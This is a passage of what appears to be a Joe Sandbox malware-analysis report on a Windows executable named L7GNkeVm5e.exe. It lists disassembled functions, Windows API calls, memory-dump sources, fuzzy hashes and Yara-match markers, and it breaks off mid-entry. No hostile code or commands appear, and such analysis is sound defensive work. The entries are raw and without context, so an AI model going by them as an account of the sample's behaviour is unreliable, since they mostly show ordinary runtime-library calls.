                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\L7GNkeVm5e.exe
                                                                                                                                                                                                                                                  • API String ID: 2506810119-4220347748
                                                                                                                                                                                                                                                  • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                  • Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\L7GNkeVm5e.exe,00000104), ref: 0212F9AA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0212FA75
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0212FA7F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\L7GNkeVm5e.exe
                                                                                                                                                                                                                                                  • API String ID: 2506810119-4220347748
                                                                                                                                                                                                                                                  • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                  • Instruction ID: 8facf950d44fbf943ec3dc07002f5198707b9aa946ccfade6258a39ecf0727b1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F319F71E80228EFDF21DF999C80D9EBBBDEF89710F104066F80497221D7709A5ACB90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0210C8D4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                  • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                                  • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                                  • Instruction ID: fbc13c51cffb980a43923277d1fdbd5d141332cf6266289b99c348f7a046b78e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47F02B73D806186FCB14E954CC81BEA33985B01305F048177EE516A0C2E7E89905CFEC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                  • String ID: <(@
                                                                                                                                                                                                                                                  • API String ID: 3213686812-4189137628
                                                                                                                                                                                                                                                  • Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                                                                                                                                                                  • Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 004394FD: GetEnvironmentStringsW.KERNEL32 ref: 00439501
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0042FA4F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0042FA56
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$EnvironmentStrings
                                                                                                                                                                                                                                                  • String ID: Ub$ Ub
                                                                                                                                                                                                                                                  • API String ID: 3523873077-2651688039
                                                                                                                                                                                                                                                  • Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                                                                                                                                                                  • Instruction ID: 08707e55e404d2c76e2f6eae856c7126cd4318a61dcb705a42d68a92314f0541
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EE0ED12F0592142E632B63B3C02A6A06144B8177EFD0423FE828D61C2DE6C880B029F
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                  • String ID: <(@
                                                                                                                                                                                                                                                  • API String ID: 3213686812-4189137628
                                                                                                                                                                                                                                                  • Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                                                                                                                                                                  • Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD
APIs
• Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
• __CxxThrowException@8.LIBVCRUNTIME ref: 00424309
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
• String ID: pScheduler
• API String ID: 1381464787-923244539
APIs
• Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041E650
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
• String ID: pContext
• API String ID: 1990795212-2046700901
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
• __CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Exception@8Throwstd::invalid_argument::invalid_argument
• String ID: pScheduler$version
• API String ID: 1687795959-3154422776
APIs
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0213046A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02136B41
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02136BCA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02136BDC
• __freea.LIBCMT ref: 02136BE5
  • Part of subcall function 021338FE: RtlAllocateHeap.NTDLL(00000000,0210DACD,00000000), ref: 02133930
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
                                                                                                                                                                                                                                                  • Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                                                                                                                                                                  • Instruction ID: aba4259d9df7f4e671a64490cc3de3b8f7b45cb7d89d1dc91f4510544bf8dab4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE31CD72A4024AAFDF268F64DC85DEE7BAAEF00714B040268EC04D7194EB35D954CFA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                                                                                                                                                                  • Instruction ID: d103751f5e86bb577f21b0ef41fc0747bac1fbbf4bb65c452d8b20089be38efe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7217C75E0021A9FDF00EFA5CC829AEB7B8EF09714F10007AF901B7291D778AD058BA5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                  • Instruction ID: 1fd2a18eeb5e86514120d7b23ca03b198f9e111abe4465f2867249718fccbdf8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E214C75A40209AFDF14EFE4DD819BEBBB9EF09710F100065E905A7290DBB4AD028FA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,00000000), ref: 00423729
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711
                                                                                                                                                                                                                                                    • Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2630251706-0
                                                                                                                                                                                                                                                  • Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                                                                                                                                                                  • Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000005), ref: 00401FA5
                                                                                                                                                                                                                                                  • UpdateWindow.USER32 ref: 00401FAD
                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401FC1
                                                                                                                                                                                                                                                  • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1339878773-0
                                                                                                                                                                                                                                                  • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                  • Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004290D3
                                                                                                                                                                                                                                                    • Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
                                                                                                                                                                                                                                                    • Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A
                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 004290E8
                                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
                                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00429121
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                                  • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                  • Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0212933A
                                                                                                                                                                                                                                                    • Part of subcall function 02129287: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021292B6
                                                                                                                                                                                                                                                    • Part of subcall function 02129287: ___AdjustPointer.LIBCMT ref: 021292D1
                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0212934F
                                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02129360
                                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 02129388
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
• Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
• Instruction ID: e16e1acfb26e9253f041095d316bb579df595a44325c592ac9b6bba639f8e129
• Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
• Instruction Fuzzy Hash: 85011372140158BFDF126EA9CD40EEB3B6AEF88754F154008FE08A6120D332E875ABA0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
• GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
• Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
• Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
• Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0213512D,00000000,00000000,00000000,00000000,?,021353E5,00000006,0044A378), ref: 021351B8
• GetLastError.KERNEL32(?,0213512D,00000000,00000000,00000000,00000000,?,021353E5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02132203), ref: 021351C4
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0213512D,00000000,00000000,00000000,00000000,?,021353E5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021351D2
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
• Instruction ID: 46d544d2c035367c2598792d42eafe4cf64ee6db9d177d79508badef7692c312
• Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
• Instruction Fuzzy Hash: 6C01F736692222BBC7324F699C44A67779BAF0AFA27610630F906D7140C720D901CAE4
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
• Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
• Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• String ID:
• API String ID: 78362717-0
• Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
• Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0212639F
• Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021263B3
• Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021263CB
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021263E3
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• String ID:
• API String ID: 78362717-0
• Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction ID: 19a8331564f0c172ecdd19970953da6b456d220f3dc8ff413ca9f1fed834564e
• Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction Fuzzy Hash: 12014932640134BBDF15EE59D940EEF779E9F94350F000015FC29A72C1DB70ED288AA0
APIs
• Concurrency::location::_Assign.LIBCMT ref: 02122BA1
• Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02122BBF
  • Part of subcall function 02118677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02118698
  • Part of subcall function 02118677: Hash.LIBCMT ref: 021186D8
• Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02122BC8
• Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02122BE8
  • Part of subcall function 0211F6CF: Hash.LIBCMT ref: 0211F6E1
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
• String ID:
• API String ID: 2250070497-0
• Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
• Instruction ID: 8c5871590f63bc07f84c6afea43f1c19560a074f9d8045d16a5890a57fc1a183
• Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
• Instruction Fuzzy Hash: A3118E76400604AFC725DFA4C881ECAFBB9AF19310F008A1EE95687591DB70F914CBA0
APIs
• Concurrency::location::_Assign.LIBCMT ref: 02122BA1
• Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02122BBF
  • Part of subcall function 02118677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02118698
  • Part of subcall function 02118677: Hash.LIBCMT ref: 021186D8
• Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02122BC8
• Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02122BE8
  • Part of subcall function 0211F6CF: Hash.LIBCMT ref: 0211F6E1
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
